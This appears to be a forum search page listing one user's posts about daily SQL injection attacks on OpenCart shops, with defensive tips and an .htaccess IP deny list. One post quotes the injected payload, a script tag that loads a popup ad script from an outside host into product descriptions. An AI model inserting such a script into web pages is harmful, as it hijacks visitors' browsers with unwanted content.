Search found 14 matches

Page 1 of 1

Search found 14 matches

Re: Opencart SQL Injection Hack

This used to happen to my client twice a day, exactly as you describe. I found a way to prevent this from happening which I'm happy to share via Private Message. Have you checked to make sure your running the latest version of your theme? Have you checked my earlier post regarding this SQL injectio...

Jump to post
  • Thu May 25, 2017 1:26 am
  • Replies 14
  • Views 8686
Re: Opencart SQL Injection Hack

And this is my latest .htaccess IP_ Lockout content, to keep 'em rangewise out for good! <Files *> order allow,deny allow from all deny from 5.77.34. deny from 37.59. deny from 37.128. deny from 46.101. deny from 46.161. deny from 46.229. deny from 47.90. deny from 51.255. deny from 63.243. deny fr...

Jump to post
  • Wed May 24, 2017 5:13 am
  • Replies 14
  • Views 8686
Re: Opencart SQL Injection Hack

This used to happen to my client twice a day, exactly as you describe. I found a way to prevent this from happening which I'm happy to share via Private Message. Have you checked to make sure your running the latest version of your theme? Have you checked my earlier post regarding this SQL injection...

Jump to post
  • Wed May 24, 2017 5:03 am
  • Replies 14
  • Views 8686
Re: Journal Theme Security Bug ( SQL Injection )

sims wrote:
Mon May 01, 2017 8:00 am
Hi Rhys
Thanks for the reply, sounds like we need to compare notes! as I have a reasonable idea how to block this now

I sent you a PM
Hi Sims,
I've sent you a PM with my findings, It's stuck in my outbox so not sure if it's bugged - have you received it?
Thanks
Rhys

Jump to post
  • Mon May 01, 2017 8:28 am
  • Replies 13
  • Views 3737
Re: Journal Theme Security Bug ( SQL Injection )

Yes Sims that's very similar just different urls, I found a way to stop that from being injected but causes a small error on the site. I fear publishing the fix would compromise my clients site. Wondering how I can provide this information to genuine Opencart admins.

Jump to post
  • Mon May 01, 2017 6:51 am
  • Replies 13
  • Views 3737
Re: Journal Theme Security Bug ( SQL Injection )

I don't believe this topic should remain solely with Journal, it should still be discussed here also. I don't see any negative reasons not to share this information with the community?

Jump to post
  • Mon May 01, 2017 5:56 am
  • Replies 13
  • Views 3737
Re: Journal Theme Security Bug ( SQL Injection )

I have also found the journal theme to have a vulnerability to SQL injections. Somehow the injection is able to inject a JavaScript into the product description forcing popup websites to customers viewing the description. I've managed to stop the injection but cannot provide information yet for secu...

Jump to post
  • Mon May 01, 2017 5:31 am
  • Replies 13
  • Views 3737
Re: OC 2.3.0.2 SQL Injection?

Gentlemen, this is what I used and it's prevented the SQL injection so far, hope it works for you also.

viewtopic.php?t=115388

Thanks
Rhys

Jump to post
  • Sat Apr 22, 2017 2:14 am
  • Replies 18
  • Views 4750
Re: OC 2.3.0.2 SQL Injection?

If you haven't already change your passwords for all admin users. Check your files on your server have not been modified by comparing against a clean download. Look through your web server logs for anything suspicious. Good advice, I replace the files so quickly to get the website functioning corre...

Jump to post
  • Wed Apr 19, 2017 2:29 pm
  • Replies 18
  • Views 4750
Re: OC 2.3.0.2 SQL Injection?

Did you really kill/delete/remove each entire Subdirectory, then, upload the entire clean Subdirectory again, only containing, what should be there by default. Or did you just overwrite the existing Subdirectory Content, without checking first, if possibly additional files exist ? But this would no...

Jump to post
  • Wed Apr 19, 2017 2:21 pm
  • Replies 18
  • Views 4750
Re: OC 2.3.0.2 SQL Injection?

If you haven't already change your passwords for all admin users. Check your files on your server have not been modified by comparing against a clean download. Look through your web server logs for anything suspicious. Good advice, I replace the files so quickly to get the website functioning corre...

Jump to post
  • Mon Apr 17, 2017 6:45 pm
  • Replies 18
  • Views 4750
OC 2.3.0.2 SQL Injection?

I have a client running OC 2.3.0.2 and there seems to be a a SQL injection occurring on a daily basis.The Product & Category description seems to include the following code: <script data-cfasync='false' type='text/javascript' src='//p79479.clksite.com/adServe/banners?tid=79479_127480_7&tagid=2'></sc...

Jump to post
  • Sun Apr 16, 2017 9:15 pm
  • Replies 18
  • Views 4750
Re: OC 2.2.0.0 SQL injection attack?

Unfortunately I also have a client who was hacked by these low lifes. I had to rebuild the site and restore everything minus the product descriptions which held the dodgy pop up scripts. I managed to lock down most of the files including Json.php to 444 so they couldn't write to it, so far so good. ...

Jump to post
  • Fri Apr 07, 2017 6:47 am
  • Replies 9
  • Views 5528
Fixed text top left of site

Good evening, I'm trying to locate why I have a strange line of text displaying on the top left of my site (picture attached).
I've done some digging and I believe it's a browser check but wanted to run it by the community before editing.
Has anyone seen this before?

Thanks
Rhys

Jump to post
  • Wed Mar 22, 2017 4:19 am
  • Replies 0
  • Views 351

Page 1 of 1

Search found 14 matches